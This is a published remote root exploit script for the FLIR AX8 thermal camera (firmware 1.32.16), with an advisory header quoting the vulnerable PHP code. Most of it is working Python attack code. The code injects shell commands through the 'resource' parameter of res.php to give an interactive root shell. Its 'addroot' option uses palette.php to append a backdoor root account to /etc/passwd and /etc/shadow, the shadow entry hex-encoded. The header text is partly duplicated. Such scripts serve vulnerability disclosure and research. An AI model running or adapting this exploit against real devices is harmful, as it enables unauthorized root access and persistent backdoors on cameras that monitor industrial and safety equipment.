FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16
# 1.17.13
# OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
#
# Summary: Thermal Imaging Camera For Continuous Condition and Safety
# Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
# Combining thermal and visual cameras in a small, affordable package,
# the AX8 provides continuous temperature monitoring and alarming capabilities
# to protec critical electrical and mechanical equipment. The AX8 helps
# you guard against unplanned outages, service interruptions, and equipment
# failure.
#
# The FLIR AX series camera/sensor also has built-in support to connect to
# industrial control equipment such as programmable logic controllers (PLCs),
# and allows the sharing of analysis and alarm results and simple control
# using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
# to install, the AX8 provides continuous monitoring of electrical cabinets,
# process and manufacturing areas, data centers, energy generation and distribution,
# transportation and mass transit, storage facilities and refrigeration warehouses.
#
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
#
# =============================================================================
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2. if (isset($_POST["action"])) {
# 3. switch ($_POST["action"]) {
# 4. case "get":
# 5. if(isset($_POST["resource"]))
# 6. {
# 7. switch ($_POST["resource"]) {
# 8. case ".rtp.hflip":
# 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10. $result = "false";
# 11. break;
# 12. }
# 13. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14. break;
# 15. case ".rtp.vflip":
# 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17. $result = "false";
# 18. break;
# 19. }
# 20. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21. break;
# 22. default:
# 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24. }
# 25. }
#
# =============================================================================
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2. if(isset($_POST["palette"])){
# 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4. echo json_encode(array("success"));
# 5. }
# 6. ?>
#
# =============================================================================
#
#
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
# lighttpd/1.4.33
# PHP/5.4.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
#
#
# 26.07.2018
#

import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
print ' x20x20[*] Usage: '+piton+' <ip:port> '
sys.exit()

bannah = """
.---------------------------------.
| 1984 Pictures |
| |
| presents |
| ___ |
| [| |=|{)__ |
| |___| / ) |
| /| /| |
| / | | \ |
.---------------------------------.
"""
print bannah
time.sleep(4)
os.system('clear')

print ' FLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'

ICU = '''
````````
`./+ooosoooooo+/.`
`.+ss+//:::::::://+ss+.`
-oyo/::::-------:::::/oyo-
`/yo+:::-------.------:::+oy/`
`+yo+::---...........----:/+oy+`
`/yo++/--...../+oo+:....---:/+oy/`
`ss++//:-.../yhhhhhhy/...-://++ss`
.ho++/::--.-yhhddddhhy-.--:://+oh.
.ho+//::---/mmmmmmmmmm:---::/++oh.
`ss++//::---+mNNNNNNm+---:://++ss`
`/yo+//:::----+syys+-----://++oy/`
`+yo++//:::-----------:://++oy+`
`/yo++///:::::-:::::://+++oy/`
.oyo+++////////////+++oyo.
`.+ssoo++++++++++ooss+.`
`./+osssssssso+/.`
````````
'''

colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]

print(''.join(colored_chars))

print
print 'x1b[1;37;44m'+'To freeze the stream run: '+'x1b[0m'+' /FLIR/usr/bin/freeze on'
print 'x1b[1;37;41m'+'To unfreeze the stream run: '+'x1b[0m'+' /FLIR/usr/bin/freeze off '

print '[*] Additional commands:'
print ' [+] 'addroot' for add root user.'
print ' [+] 'exit' for exit. '

while True:

zeTargets = 'http://'+sys.argv[1]+'/res.php'
zeCommand = raw_input('x1b[0;96;49m'+'root@neco-0J0X17:~# '+'x1b[0m')
zeHeaders = {'Cache-Control' : 'max-age=0',
'User-Agent' : 'thricer/251.4ev4h',
'Accept' : 'text/html,application/xhtml+xml',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'close',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'action' : 'get',
'resource' : ';'+zeCommand}

try:

zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
print json.loads(zeRequest.text)

if zeCommand.strip() == 'exit':
sys.exit()

if zeCommand.strip() == 'addroot':
print '[+] Blind command injection using palette.php...'
print '[+] Adding user 'roOt' with password 'rewt' in shadow file...'

nuTargets = 'http://'+sys.argv[1]+'/palette.php'
nuHeaders = zeHeaders

nuHexstrn = ('\x72\x6f\x4f\x74\x3a\x24\x31'
'\x24\x4d\x4a\x4f\x6e\x56\x2f'
'\x59\x33\x24\x74\x44\x6e\x4d'
'\x49\x42\x4d\x79\x30\x6c\x45'
'\x51\x32\x6b\x44\x70\x66\x67'
'\x54\x4a\x50\x30\x3a\x31\x36'
'\x39\x31\x34\x3a\x30\x3a\x39'
'\x39\x39\x39\x39\x3a\x37\x3a'
'\x3a\x3a\x0a\x0d')

nuPadata1 = {'palette' : '1;echo "roOt:x:0:0:pwn:/sys:/bin/bash" >> /etc/passwd'}
nuPadata2 = {'palette' : '1;echo -n -e "'+nuHexstrn+'" >> /etc/shadow'}

requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
time.sleep(2)
requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)

print '[*] Success! '
else: pass

except Exception:
print '[*] Error!'
break

sys.exit()